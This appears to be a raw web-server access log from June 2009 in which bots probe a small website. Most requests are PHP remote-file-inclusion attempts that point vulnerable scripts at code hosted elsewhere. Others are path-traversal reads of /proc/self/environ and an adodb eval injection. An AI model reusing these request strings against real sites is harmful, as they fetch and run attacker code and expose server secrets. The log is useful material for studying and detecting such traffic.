83.13.191.186 - - [29/Jun/2009:09:04:23 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:04:23 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:04:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:09:05:23 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:05:41 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:05:43 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:05:51 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:05:52 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
80.93.48.103 - - [29/Jun/2009:09:08:18 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:08:48 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:09:30 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:09:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:09:30 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:10:05 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:10:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:10:05 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:13 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:13 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:16 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:17 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:17 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:17 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:18 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:18 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.187 - - [29/Jun/2009:09:12:18 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://buseong.hs.kr/db_control/include/id1.gif?? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:21 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:21 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:21 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:21 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:21 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:22 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:22 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:09:12:22 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:09:13:01 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:09:13:01 -0700] "GET //vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:09:13:01 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:09:14:23 -0700] "GET /logs//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:09:14:23 -0700] "GET /include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:09:14:23 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.186.1.54 - - [29/Jun/2009:09:15:37 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
89.186.1.54 - - [29/Jun/2009:09:15:37 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
89.186.1.54 - - [29/Jun/2009:09:15:37 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
202.181.243.113 - - [29/Jun/2009:09:18:24 -0700] "GET /logs/customer_testimonials.php?testimonial_id=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:19:34 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:19:34 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:19:34 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:21:22 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:21:22 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:21:22 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:21:26 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:22:24 -0700] "GET /logs/access.log%20%20///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:09:22:58 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:23:30 -0700] "GET /logs/access.log%20%20///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:23:40 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:25:14 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:25:14 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:26:48 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:26:48 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:26:48 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:28:43 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:28:43 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:28:43 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:31:51 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:31:51 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:33:54 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.27.203.107 - - [29/Jun/2009:09:33:56 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:09:34:45 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:09:34:46 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:09:34:46 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:36:23 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:37:11 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
82.194.87.219 - - [29/Jun/2009:09:41:00 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.redneckmba.com"
82.194.87.219 - - [29/Jun/2009:09:41:51 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.redneckmba.com"
72.249.175.136 - - [29/Jun/2009:09:43:09 -0700] "GET /logs/access.log/ftp://75.35.156.121/idx.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
72.249.175.136 - - [29/Jun/2009:09:43:10 -0700] "GET /ftp://75.35.156.121/idx.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
72.249.175.136 - - [29/Jun/2009:09:43:10 -0700] "GET /logs/ftp://75.35.156.121/idx.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
82.194.87.219 - - [29/Jun/2009:09:43:50 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:48:17 -0700] "GET /logs/access.log//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:48:17 -0700] "GET /main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:48:17 -0700] "GET /logs//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:48:57 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:51:01 -0700] "GET /logs/access_090112.log%20%20//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:51:01 -0700] "GET /main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:51:06 -0700] "GET /logs//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
82.194.87.219 - - [29/Jun/2009:09:51:26 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.redneckmba.com"
79.8.85.135 - - [29/Jun/2009:09:57:49 -0700] "GET /logs/access.log//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.14.199.8 - - [29/Jun/2009:10:07:23 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:18 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:18 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:18 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:18 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:19 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:19 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:19 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
216.120.227.2 - - [29/Jun/2009:10:18:19 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:26 -0700] "GET /lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:26 -0700] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:26 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:40 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:40 -0700] "GET /lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:18:40 -0700] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:24:18 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:24:18 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:24:26 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:25:11 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:25:11 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:25:11 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:25:45 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [29/Jun/2009:10:25:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.86.9.234 - - [29/Jun/2009:10:26:06 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:28:09 -0700] "GET /logs/access.log%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:10:29:52 -0700] "GET /logs/access.log%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
69.94.80.27 - - [29/Jun/2009:10:34:52 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
69.94.80.27 - - [29/Jun/2009:10:34:52 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
69.94.80.27 - - [29/Jun/2009:10:34:52 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
69.94.80.27 - - [29/Jun/2009:10:34:54 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
